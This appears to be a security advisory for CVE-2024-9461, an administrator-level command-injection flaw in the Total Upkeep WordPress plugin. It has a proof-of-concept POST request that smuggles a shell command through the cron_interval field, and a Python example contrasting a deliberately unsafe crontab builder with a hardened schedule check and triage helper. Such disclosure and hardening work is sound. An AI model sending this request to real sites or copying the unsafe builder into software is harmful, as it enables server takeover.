Vulnerability Title: Total Upkeep <= 1.16.5 - Authenticated (Administrator+) Remote Code Execution via Backup Settings
CVE ID: CVE-2024-9461
CVSS Severity Score: 7.2 (High)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Organization: Wordfence
Vulnerability Researcher(s): Jonas Benjamin Friedli
The vulnerable page is the Backup Schedule section of the plugin's settings. The following request creates a crontab entry that runs every minute and creates or updates the file /tmp/poc. The site_check parameter must be set to false (0), and the request must be sent with an Administrator session cookie and a valid settings nonce (the settings_auth value below), which is why the issue is rated PR:H. The cron_interval value is written into the crontab entry without being restricted to a schedule, so anything appended after the five schedule fields is executed by cron:
```http
POST /wordpress/wp-admin/admin.php?page=boldgrid-backup-settings HTTP/1.1

cron_interval=*%20*%20*%20*%20*%20%2fusr%2fbin%2ftouch%20%2ftmp%2fpoc%20%26%26&site_check=0&submit=Save+Changes&settings_auth=26daf103b2&save_time=1723968375
```
(The Host, Cookie and Content-Type: application/x-www-form-urlencoded headers are omitted above and must be supplied.)

After URL decoding, cron_interval resolves to "* * * * * /usr/bin/touch /tmp/poc &&", so the attacker's command runs first and the plugin's own backup command is chained after it.
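The check that stops this class of bug is to accept nothing but a bare five-field schedule before the value reaches the crontab. The following is an added example, not the plugin's code and not Wordfence's: it decodes the advisory's request body, shows the unsafe concatenation next to a hardened builder, and doubles as a triage helper for reviewing captured request bodies. The backup command string and the benign body are constructed placeholders.

```python
"""Added example (not the plugin's own code): decode the PoC body and show why
restricting cron_interval to a bare five-field schedule stops the injection."""
import re
from typing import Optional
from urllib.parse import parse_qs

# One cron field: '*' or a number, optional '-range', optional '/step',
# optionally repeated as a comma list. Spaces, '&' and path slashes are not allowed.
_FIELD = r"(?:\*|\d+)(?:-\d+)?(?:/\d+)?(?:,(?:\*|\d+)(?:-\d+)?(?:/\d+)?)*"
# Exactly five fields separated by spaces or tabs. fullmatch rejects trailing
# command text, shell operators and newline-injected extra crontab lines.
_SCHEDULE = re.compile(rf"{_FIELD}(?:[ \t]+{_FIELD}){{4}}")


def is_strict_cron_schedule(value: str) -> bool:
    """True only if value is a bare five-field cron schedule."""
    return _SCHEDULE.fullmatch(value.strip(" \t")) is not None


def cron_interval_from_body(body: str) -> Optional[str]:
    """Return the decoded cron_interval parameter from a form-encoded body."""
    values = parse_qs(body).get("cron_interval")
    return values[0] if values else None


def build_crontab_line_vulnerable(cron_interval: str, command: str) -> str:
    """Unsafe pattern: the user-supplied interval is concatenated as-is, so a
    value that carries its own command makes cron run attacker-chosen code."""
    return f"{cron_interval} {command}"


def build_crontab_line_hardened(cron_interval: str, command: str) -> str:
    """Refuse anything that is not purely a schedule before it reaches cron."""
    if not is_strict_cron_schedule(cron_interval):
        raise ValueError("cron_interval must be a bare five-field schedule")
    return f"{cron_interval.strip()} {command}"


def request_is_suspicious(body: str) -> bool:
    """Triage helper for WAF rules or log review: flag any body whose
    cron_interval carries more than a schedule."""
    interval = cron_interval_from_body(body)
    return interval is not None and not is_strict_cron_schedule(interval)


# POC_BODY is copied from the advisory's request; the other two values are
# constructed placeholders for this example.
POC_BODY = (
    "cron_interval=*%20*%20*%20*%20*%20%2fusr%2fbin%2ftouch%20%2ftmp%2fpoc%20%26%26"
    "&site_check=0&submit=Save+Changes&settings_auth=26daf103b2&save_time=1723968375"
)
BENIGN_BODY = "cron_interval=0%203%20*%20*%20*&site_check=0&submit=Save+Changes"
BACKUP_COMMAND = "/path/to/plugin-backup-command"  # hypothetical placeholder


if __name__ == "__main__":
    interval = cron_interval_from_body(POC_BODY)
    print("decoded cron_interval:", repr(interval))
    print("vulnerable crontab line:", build_crontab_line_vulnerable(interval, BACKUP_COMMAND))
    try:
        build_crontab_line_hardened(interval, BACKUP_COMMAND)
    except ValueError as exc:
        print("hardened builder rejected it:", exc)
    print("benign body suspicious?", request_is_suspicious(BENIGN_BODY))
```

The whitelist deliberately excludes names such as "mon" or "jan" and the "@hourly" shortcuts; a backup scheduler only needs numeric fields, and a narrower grammar leaves less room for a bypass. For incident response, the same is_strict_cron_schedule check can be run over every entry in the web user's crontab: any line whose first five fields are followed by a command the plugin did not write is an indicator of this exploit.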